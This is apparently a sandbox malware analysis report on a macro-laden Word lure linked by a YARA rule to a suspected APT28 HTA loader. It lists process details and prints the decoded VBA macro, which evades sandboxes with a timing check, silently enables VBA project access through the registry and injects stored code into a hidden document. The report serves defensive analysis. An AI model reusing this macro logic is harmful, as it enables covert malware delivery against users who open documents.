                        2025-01-13 20:35:43 UTC  224                OUT        Data Ascii: BND 3 CON\WNS 1044478 197MS-CV: lX2vJPKD90GW8IvR.3Context: b2acb5805f18a21f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2025-01-13 20:35:44 UTC  14                 IN         Data Ascii: 202 1 CON 58
                        2025-01-13 20:35:44 UTC  58                 IN         Data Ascii: MS-CV: UfgDYzzwq0yJWOjeHdaVRg.0Payload parsing failed.



                        Target ID:0
                        Start time:15:33:20
                        Start date:13/01/2025
                        Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                        Imagebase:0x7ff642750000
                        File size:1'637'952 bytes
                        MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:7
                        Start time:15:33:45
                        Start date:13/01/2025
                        Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                        Imagebase:0x7ff642750000
                        File size:1'637'952 bytes
                        MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:9
                        Start time:15:33:48
                        Start date:13/01/2025
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale
                        Imagebase:0x7ff6c29d0000
                        File size:32'768 bytes
                        MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: 00000009.00000002.2963111692.00000230803F0000.00000004.00000800.00020000.00000000.sdmp, Author: Sekoia.io
                        Reputation:moderate
                        Has exited:false

                        Call Graph

                        Module: ThisDocument

                        Declaration
                        Line  Content
                        1     Attribute VB_Name = "ThisDocument"
                        2     Attribute VB_Base = "1Normal.ThisDocument"
                        3     Attribute VB_GlobalNameSpace = False
                        4     Attribute VB_Creatable = False
                        5     Attribute VB_PredeclaredId = True
                        6     Attribute VB_Exposed = True
                        7     Attribute VB_TemplateDerived = True
                        8     Attribute VB_Customizable = True
                        9     Public objApp, wsl

                        APIs / Meta Information
                        Unprotect
                        Shapes
                        ActiveDocument
                        Panes
                        Delete
                        Save
                        Now
                        Now
                        TimeValue
                        DoEvents
                        Now
                        TimeValue
                        Part of subcall function verydanger@ThisDocument: CreateObject
                        Part of subcall function verydanger@ThisDocument: RegWrite
                        Part of subcall function verydanger@ThisDocument: Version
                        Part of subcall function verydanger@ThisDocument: Application
                        CreateObject
                          Meta Information: CreateObject("Word.Application") -> Microsoft Word
                        Visible
                        Documents
                        Variables
                        ActiveDocument
                        Add
                        Name
                        AddFromString
                        vbCrLf
                        Part of subcall function danger@ThisDocument: Item
                        ExpandEnvironmentStrings
                          Meta Information: IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Ganji\AppData\Local\Temp
                        SaveAs2
                        Name
                        ActiveDocument
                        Close
                        Part of subcall function rundoc@ThisDocument: Open
                        Part of subcall function rundoc@ThisDocument: Save
                        Part of subcall function rundoc@ThisDocument: Close
                        Name
                        ActiveDocument
                        Quit

                        Strings / Decrypted Strings
                        "oikmseM#*inmowefj8349an3"
                        "00:00:15"
                        "Word.Application"
                        "Sub goods() : : End Sub"
                        "ThisDocument"
                        "%localapp""data%\T""emp"
                        Line  Instruction / Meta Information
                        24  Sub documeNt_opEn()
                        25  On Error Resume Next
                              Meta Information: executed
                        26  ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
                              Meta Information: Unprotect
                        27  For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step - 1
                              Meta Information: Shapes, ActiveDocument, Panes
                        28  ActiveDocument.Shapes(i).Delete
                              Meta Information: Delete
                        29  Next i
                              Meta Information: Shapes, ActiveDocument, Panes
                        30  ActiveDocument.Save
                              Meta Information: Save
                        31  sss = Now()
                              Meta Information: Now
                        32  While Now < sss + TimeValue("00:00:20")
                              Meta Information: Now, TimeValue
                        33  DoEvents
                              Meta Information: DoEvents
                        34  Wend
                              Meta Information: Now, TimeValue
                        35  If Now() - sss < TimeValue("00:00:15") Then
                              Meta Information: Now, TimeValue
                        35  Exit Sub
                        35  Endif
                        36  verydanger
                        37  Set objApp = CreateObject("Word.Application")
                              Meta Information: CreateObject("Word.Application") -> Microsoft Word; executed
                        38  objApp.Visible = False
                              Meta Information: Visible
                        39  Set doc = objApp.Documents.Add
                              Meta Information: Documents
                        40  For Each vars in ActiveDocument.Variables
                              Meta Information: Variables, ActiveDocument
                        41  doc.Variables.Add vars.Name & "ergegdr", vars
                              Meta Information: Add, Name
                        42  i = i + 1
                        43  Next
                              Meta Information: Variables, ActiveDocument
                        44  doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
                              Meta Information: AddFromString, vbCrLf
                        45  tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
                              Meta Information: IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Ganji\AppData\Local\Temp; executed
                        46  doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13
                              Meta Information: SaveAs2, Name, ActiveDocument
                        47  doc.Close
                              Meta Information: Close
                        48  rundoc (tmp & "\" & ActiveDocument.Name & ".doc")
                              Meta Information: Name, ActiveDocument
                        49  objApp.Quit False
                              Meta Information: Quit
                        50  End Sub

                        APIs / Meta Information
                        Open
                          Meta Information: Documents.Open("C:\Users\Ganji\AppData\Local\Temp\Rev5_ Joint Declaration C5 GER_track changes.doc.doc")
                        Save
                        Close

                        Line  Instruction / Meta Information
                        13  Function rundoc(namedoc)
                        14  Set doc2 = objApp.Documents.Open(namedoc)
                              Meta Information: Documents.Open("C:\Users\Ganji\AppData\Local\Temp\Rev5_ Joint Declaration C5 GER_track changes.doc.doc"); executed
                        15  doc2.Save
                              Meta Information: Save
                        16  doc2.Close
                              Meta Information: Close
                        17  End Function

                        APIs / Meta Information
                        CreateObject
                          Meta Information: CreateObject("WScript.Shell")
                        RegWrite
                        Version
                        Application

                        Strings / Decrypted Strings
                        "WSc""ript.She"
                        "HK""CU\Softw""are\Micr""osoft\Of""fice\"
                        "REG_D""WORD"

                        Line  Instruction / Meta Information
                        18  Sub verydanger()
                        19  strng = "WSc" & "ript.She"
                              Meta Information: executed
                        20  strng = strng & "ll"
                        21  Set wsl = CreateObject(strng)
                              Meta Information: CreateObject("WScript.Shell"); executed
                        22  wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
                              Meta Information: RegWrite, Version, Application
                        23  End Sub

                        APIs / Meta Information
                        Item

                        Strings / Decrypted Strings
                        "s2"

                        Line  Instruction / Meta Information
                        10  Function danger()
                        11  danger = ActiveDocument.Variables.Item("s2")
                              Meta Information: Item; executed
                        12  End Function
